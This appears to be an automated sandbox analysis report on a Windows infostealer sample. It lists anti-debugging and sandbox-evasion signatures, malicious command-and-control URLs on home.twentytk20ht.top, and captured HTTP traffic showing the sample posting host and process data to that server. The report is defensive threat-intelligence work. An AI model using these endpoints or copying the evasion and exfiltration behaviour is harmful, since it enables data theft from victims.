Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jklg6EIhyR.exe

Overview

General Information

Sample name:jklg6EIhyR.exe
renamed because original name is a hash value
Original sample name:bec048b8a886ac4f2f72a47a41057f6d.exe
Analysis ID:1580914
MD5:bec048b8a886ac4f2f72a47a41057f6d
SHA1:19ad6894a66b4a5fec94097dc8e34ae6d599b1c2
SHA256:b791f8f262d7c1436a8132fdcc6b578095e490ad531600b829af4c9095d53955
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • jklg6EIhyR.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\jklg6EIhyR.exe" MD5: BEC048B8A886AC4F2F72A47A41057F6D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: jklg6EIhyR.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: jklg6EIhyR.exeVirustotal: Detection: 51%Perma Link
Source: jklg6EIhyR.exeReversingLabs: Detection: 71%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: jklg6EIhyR.exeJoe Sandbox ML: detected
Source: jklg6EIhyR.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_007DA5B0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_007DB560
Source: jklg6EIhyR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0077255D
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_007729FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 556460Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 38 37 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0083A8C0 recvfrom,0_2_0083A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknownHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 556460Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 38 37 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 12:08:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 12:08:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: jklg6EIhyR.exe, 00000000.00000003.1415306880.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431509799.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: jklg6EIhyR.exe, 00000000.00000003.1415306880.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431509799.00000000017F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1
Source: jklg6EIhyR.exe, 00000000.00000002.1431540509.0000000001805000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414692256.0000000001801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: jklg6EIhyR.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: jklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699

System Summary

barindex
PE file contains section with special chars
Source: jklg6EIhyR.exeStatic PE information: section name:
Source: jklg6EIhyR.exeStatic PE information: section name: .idata
Source: jklg6EIhyR.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_018639550_3_01863955
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007805B00_2_007805B0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00786FA00_2_00786FA0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0083B1800_2_0083B180
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007AF1000_2_007AF100
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_008400E00_2_008400E0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AFE0300_2_00AFE030
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007D62100_2_007D6210
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0083C3200_2_0083C320
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_008404200_2_00840420
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AC44100_2_00AC4410
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0077E6200_2_0077E620
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AF47800_2_00AF4780
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007DA7F00_2_007DA7F0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AD67300_2_00AD6730
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0083C7700_2_0083C770
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0077A9600_2_0077A960
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007849400_2_00784940
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0082C9000_2_0082C900
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00946AC00_2_00946AC0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00A2AAC00_2_00A2AAC0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AE8BF00_2_00AE8BF0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00A2AB2C0_2_00A2AB2C
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0077CBB00_2_0077CBB0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00904B600_2_00904B60
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AFCC700_2_00AFCC70
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00930D800_2_00930D80
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AECD800_2_00AECD80
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AF4D400_2_00AF4D40
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00A8AE300_2_00A8AE30
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00794F700_2_00794F70
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0083EF900_2_0083EF90
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00838F900_2_00838F90
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AC2F900_2_00AC2F90
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007810E60_2_007810E6
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00ADD4300_2_00ADD430
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AE35B00_2_00AE35B0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AC56D00_2_00AC56D0
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00B017800_2_00B01780
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_008298800_2_00829880
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AC99200_2_00AC9920
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 007B4F40 appears 290 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 007B4FD0 appears 223 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 007775A0 appears 591 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 0094CBC0 appears 93 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 007773F0 appears 102 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 0078CCD0 appears 53 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 00927220 appears 96 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 0078CD40 appears 63 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 007771E0 appears 43 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 0077CAA0 appears 62 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 007B50A0 appears 83 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 008544A0 appears 59 times
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: String function: 007B5340 appears 41 times
Source: jklg6EIhyR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: jklg6EIhyR.exeStatic PE information: Section: pfhmiofh ZLIB complexity 0.9944125996879334
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0077255D
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_007729FF
Source: C:\Users\user\Desktop\jklg6EIhyR.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\jklg6EIhyR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
